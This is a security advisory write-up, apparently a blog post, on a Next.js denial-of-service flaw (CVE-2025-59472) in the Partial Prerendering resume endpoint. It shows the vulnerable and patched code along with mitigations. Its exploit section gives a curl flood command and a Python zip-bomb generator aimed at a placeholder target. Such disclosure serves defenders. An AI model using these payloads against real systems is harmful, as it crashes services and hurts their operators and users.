CVE-2025-59472

Next.js PPR: When 'Minimal Mode' Maximizes Your Downtime

Alon Barad
Software Engineer

Jan 28, 2026 · 6 min read

Executive Summary (TL;DR)

Next.js 'minimal mode' with PPR enabled accepted resume requests without any size limit. An attacker could send a massive payload or a zip bomb, driving the Node.js process out of memory and crashing it instantly.

A Denial of Service (DoS) vulnerability exists in Next.js versions utilizing Partial Prerendering (PPR) in 'minimal mode'. An unauthenticated attacker can exploit the 'resume' endpoint by sending an unbounded or maliciously compressed POST body, leading to a heap out-of-memory (OOM) crash via either unchecked buffer concatenation or a decompression bomb.

The Hook: The Shiny New Hammer

In the relentless pursuit of faster First Contentful Paints (FCP), Next.js introduced Partial Prerendering (PPR). It's a clever hybrid model where a static shell is served immediately, and the dynamic bits are streamed in later. To make this magic work across distributed systems (like Vercel's own infrastructure or complex container setups), there's a configuration flag called Minimal Mode (NEXT_PRIVATE_MINIMAL_MODE).

When this mode is active, the Next.js server acts a bit differently. It expects to be part of a relay race, receiving a 'postponed state' from a previous hop to resume rendering. It exposes a mechanism to accept this state via a POST request.

Here's the kicker: The developers assumed that these POST requests would come from trusted internal infrastructure or a well-behaved proxy. But as any security researcher knows, assumptions are the mother of all exploits. The endpoint handling these resume requests didn't just trust the source; it trusted the size of the data implicitly. That's like agreeing to eat whatever someone puts on your plate without asking if it's a 12oz steak or a whole cow.

The Flaw: The Glutton and the Bomb

The vulnerability stems from a classic violation of the 'Never Trust User Input' commandment, specifically regarding resource allocation. The flaw manifests in two distinct but equally deadly ways within the base-server.ts logic.

Vector A: The Glutton (Unbounded Buffering) When the server sees the Next-Resume: 1 header, it starts listening to the request stream. In the vulnerable versions, it simply pushed every chunk of data it received into an array and then attempted to merge them using Buffer.concat(). There was no brake pedal. If you sent 4GB of data, the server allocated memory for 4GB of data. In V8 (the JavaScript engine powering Node.js), the heap has a hard limit. Cross that line, and the process commits seppuku.

Vector B: The Zipbomb (Decompression) It gets worse. This postponed state is usually compressed to save bandwidth. The server used zlib.inflateSync() to unpack it. The keyword here is Sync. Not only does this block the event loop, but the implementation also lacked a maxOutputLength. An attacker could send a tiny, valid compressed payload (around 1MB) that expands into gigabytes of repeated bytes. The server blindly attempts to allocate memory for the uncompressed result, triggering an instant OOM crash the moment inflation starts.

The Code: Autopsy of a Crash

Let's look at the smoking gun in base-server.ts. This is the code that blindly accepted the resume data.

The Vulnerable Code:

// The "Before" Logic
if (req.headers['next-resume'] === '1') {
  const body = []
  req.on('data', (chunk) => {
    body.push(chunk) // <--- No size check!
  })
  req.on('end', () => {
    const buffer = Buffer.concat(body) // <--- Fatal OOM happens here
    // ... proceed to unzip without limits
  })
}

The Fix (Next.js 16.1.5):

The patch introduces a strict diet. They implemented a size counter that increments with every chunk. If the accumulator exceeds the new experimental.maxPostponedStateSize (default 10MB), the server immediately bails with a 413 error.

// The "After" Logic
const body = []
let receivedSize = 0
const MAX_SIZE = 10 * 1024 * 1024 // 10MB default

req.on('data', (chunk) => {
  receivedSize += chunk.length
  if (receivedSize > MAX_SIZE) {
    // Abort the request immediately and stop reading the stream
    res.statusCode = 413
    res.end('Payload Too Large')
    req.destroy()
    return
  }
  body.push(chunk)
})
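If the 10MB default is still too generous for your deployment, the limit is exposed as configuration. A hedged sketch of what tightening it might look like in next.config.js (the option name experimental.maxPostponedStateSize comes from the advisory; the exact shape may differ by version):

```javascript
// next.config.js (sketch; verify the option name against your Next.js version)
module.exports = {
  experimental: {
    ppr: true,
    maxPostponedStateSize: 5 * 1024 * 1024, // tighten from the 10MB default
  },
}
```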

Furthermore, for the decompression vector, they wrapped the inflate call to ensure the output size doesn't exceed a multiplier (5x) of the input size. This kills the zipbomb dead.

The Exploit: Crashing the Party

Exploiting this is trivial if you can reach a Next.js instance running in minimal mode with PPR. You don't need authentication. You don't need a user account. All you need is curl.

Scenario 1: The Raw Flood If you have a fast uplink, you can just pour data into the socket until the server dies.

# Generate a 2GB file of garbage
dd if=/dev/urandom of=doom.bin bs=1M count=2048
 
# Send it with the magic header
curl -X POST \
  -H "Next-Resume: 1" \
  --data-binary @doom.bin \
  https://target-nextjs-app.com/any-route

Scenario 2: The Silent Assassin (Zipbomb) This is more elegant. We create a highly compressed payload that fits in a standard request but explodes in memory. This bypasses typical WAF/Proxy body size limits (which might cap requests at 10MB) because the compressed payload is small.

# generate_bomb.py
import zlib

# Create 1GB of 'A's
payload = b'A' * (1024 * 1024 * 1024)

# Compress it (zlib.compress emits zlib/deflate output,
# which is exactly what inflateSync expects, despite the .gz name below)
compressed = zlib.compress(payload)

# Write to file (the result is roughly 1MB)
with open('bomb.gz', 'wb') as f:
    f.write(compressed)

When the server receives bomb.gz, zlib.inflateSync tries to allocate the full 1GB result as one contiguous buffer on the heap. Game over.

The Impact: Why Should We Panic?

This is a high-impact Availability vulnerability (the 'A' in the CIA triad). While it doesn't leak data (Confidentiality) or allow code modification (Integrity), it allows a single malicious actor to take down an entire rendering fleet.

In a containerized environment (like Kubernetes), the pod will crash. The orchestrator will restart it. The attacker sends another request. The pod crashes again. This creates a CrashLoopBackOff scenario, effectively keeping the service offline for as long as the attack persists.

For serverless environments, the impact is financial and operational. You are paying for the compute time to process these massive blobs right up until the crash, and the resulting cold starts will degrade performance for legitimate users. It's a remarkably cheap attack to execute with expensive consequences for the defender.

The Fix: Putting the Genie Back in the Bottle

The remediation is straightforward: Update Next.js. The patch was backported, so you have options depending on your major version.

Patch Levels:

  • Next.js 16: Update to v16.1.5 or later.
  • Next.js 15: Update to v15.6.0-canary.61 or later.

If you cannot upgrade immediately, your options are limited but effective:

  1. Disable Minimal Mode: If you aren't strictly required to use NEXT_PRIVATE_MINIMAL_MODE=1 (e.g., you aren't running on a specific provider that mandates it), turn it off. The vulnerable code path is gated behind this environment variable.
  2. WAF Filtering: Configure your Web Application Firewall to drop any POST request containing the Next-Resume header if it comes from the public internet. This header should essentially only ever originate from trusted internal infrastructure.
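If your traffic passes through a Node layer you control, mitigation 2 can be sketched as a few lines of middleware (blockResumeHeader is a hypothetical filter, not an official API; adapt the rule to whatever proxy or WAF you actually run):

```javascript
// Drop any public request carrying the internal Next-Resume header.
// Node lowercases incoming header names, so check 'next-resume'.
function blockResumeHeader(req, res, next) {
  if (req.headers['next-resume'] !== undefined) {
    res.statusCode = 403
    res.end('Forbidden')
    return
  }
  next()
}

module.exports = blockResumeHeader
```

The same rule translates directly to most WAFs: match the Next-Resume request header on POSTs from untrusted sources and reject.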

Technical Appendix

  • CVSS Score: 5.9 / 10 (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H)
  • EPSS Probability: 0.04% (top 88% most exploited)

Affected Systems

  • Next.js 15.x < 15.6.0-canary.61
  • Next.js 16.x < 16.1.5

Affected Versions Detail

Product             Affected Versions            Fixed Version
Next.js (Vercel)    15.0.0 - 15.6.0-canary.60    15.6.0-canary.61
Next.js (Vercel)    16.0.0 - 16.1.4              16.1.5

  • CWE ID: CWE-400 (Uncontrolled Resource Consumption)
  • Attack Vector: Network (POST Request)
  • CVSS: 5.9 (Medium)
  • Impact: Denial of Service (OOM Crash)
  • EPSS Score: 0.0004
  • Vulnerable Config: Minimal Mode + PPR

Vulnerability Timeline

  • 2026-01-07: Fix committed to Next.js repository
  • 2026-01-26: CVE published
  • 2026-01-26: Next.js 16.1.5 released
